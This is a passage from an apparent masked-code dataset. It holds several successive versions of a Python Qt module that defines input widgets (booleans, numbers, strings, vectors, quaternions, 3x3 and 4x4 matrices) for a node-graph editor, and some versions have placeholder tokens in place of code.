m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n 
self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BoolInputWidget(InputWidgetSingle):\n <mask token>\n\n def __init__(self, parent=None, **kwds):\n super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(\n val)))\n <mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n 
super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass 
Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = 
self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n 
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n 
m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass EnumInputWidget(InputWidgetSingle):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass FloatInputWidget(InputWidgetSingle):\n \"\"\"\n Floating point data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(FloatInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QDoubleSpinBox(self)\n _configDoubleSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(float(val))\n\n\nclass IntInputWidget(InputWidgetSingle):\n \"\"\"\n Decimal number input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(IntInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QSpinBox(self)\n _configIntSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(int(val))\n\n\nclass NoneInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(NoneInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n self.le.setEnabled(False)\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass StringInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(StringInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass BoolInputWidget(InputWidgetSingle):\n \"\"\"Boolean data input widget\"\"\"\n\n def __init__(self, 
parent=None, **kwds):\n super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(\n val)))\n\n def setWidgetValue(self, val):\n if bool(val):\n self.cb.setCheckState(QtCore.Qt.Checked)\n else:\n self.cb.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, 
**kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass 
Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = 
self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n 
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n 
m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-5": "import weakref\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt.QtWidgets import QDoubleSpinBox\nfrom Qt.QtWidgets import QSpinBox\nfrom Qt.QtWidgets import QWidget\nfrom Qt.QtWidgets import QSpacerItem\nfrom Qt.QtWidgets import QPushButton\nfrom Qt.QtWidgets import QComboBox\nfrom Qt.QtWidgets import QLineEdit\nfrom Qt.QtWidgets import QCheckBox\nfrom Qt.QtWidgets import QGraphicsProxyWidget\nfrom Qt.QtWidgets import QGridLayout\nfrom Qt.QtWidgets import QHBoxLayout\nfrom Qt.QtWidgets import QSizePolicy\nfrom AGraphCommon import *\nfrom AbstractGraph import PinBase\nfrom ..Ui import FloatVector3InputWidget_ui\nfrom ..Ui import FloatVector4InputWidget_ui\nfrom ..Ui import Matrix33InputWidget_ui\nfrom ..Ui import Matrix44InputWidget_ui\nimport pyrr\n\n\ndef _configDoubleSpinBox(sb):\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n\ndef _configIntSpinBox(sb):\n sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)\n\n\nclass InputWidgetRaw(QWidget):\n \"\"\"\n This type of widget can be used as a base class for complex ui generated by designer\n \"\"\"\n def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):\n super(InputWidgetRaw, self).__init__(parent=parent, **kwds)\n self._defaultValue = defaultValue\n # fuction with signature void(object)\n # this will set data to pin\n self.dataSetCallback = dataSetCallback\n\n def onResetValue(self):\n self.setWidgetValue(self._defaultValue)\n\n def setWidgetValue(self, value):\n '''to widget'''\n pass\n\n def widgetValueUpdated(self, value):\n '''from widget'''\n pass\n\n\nclass InputWidgetSingle(InputWidgetRaw):\n \"\"\"\n This type of widget is used for a simple widgets like buttons, checkboxes etc.\n It consists of horizontal layout widget itself and reset button.\n \"\"\"\n\n def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):\n 
